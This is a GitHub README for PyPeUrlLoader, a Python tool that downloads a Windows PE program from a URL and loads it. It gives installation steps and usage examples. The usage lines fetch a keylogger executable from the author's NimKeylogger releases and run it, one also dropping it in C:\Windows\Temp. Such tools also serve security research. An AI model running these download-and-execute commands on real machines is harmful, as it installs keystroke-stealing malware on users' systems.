Skip to content

mauricelambert/PyPeUrlLoader

Repository files navigation

PyPeUrlLoader Logo

PyPeUrlLoader

Description

This package uses PyPeLoader to load a PE program from a HTTP server (from an URL).

Requirements

This package require:

  • python3
  • python3 Standard Library
  • PyPeLoader >= 1.0.0

Installation

Pip

python3 -m pip install PyPeUrlLoader

Git

git clone "https://github.com/mauricelambert/PyPeUrlLoader.git"
cd "PyPeUrlLoader"
python3 -m pip install .

Wget

wget https://github.com/mauricelambert/PyPeUrlLoader/archive/refs/heads/main.zip
unzip main.zip
cd PyPeUrlLoader-main
python3 -m pip install .

cURL

curl -O https://github.com/mauricelambert/PyPeUrlLoader/archive/refs/heads/main.zip
unzip main.zip
cd PyPeUrlLoader-main
python3 -m pip install .

Usages

Command line

PyPeUrlLoader              # Using CLI package executable
python3 -m PyPeUrlLoader   # Using python module
python3 PyPeUrlLoader.pyz  # Using python executable
PyPeUrlLoader.exe          # Using python Windows executable

PyPeUrlLoader https://github.com/mauricelambert/NimKeylogger/releases/download/v0.0.1/Keylogger.exe keylogger
PyPeUrlLoader https://github.com/mauricelambert/NimKeylogger/releases/download/v0.0.1/Keylogger.exe keylogger C:\Windows\Temp\keylogger.exe

Links

License

Licensed under the GPL, version 3.

About

This package uses PyPeLoader to load a PE program from a HTTP server (from an URL).

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages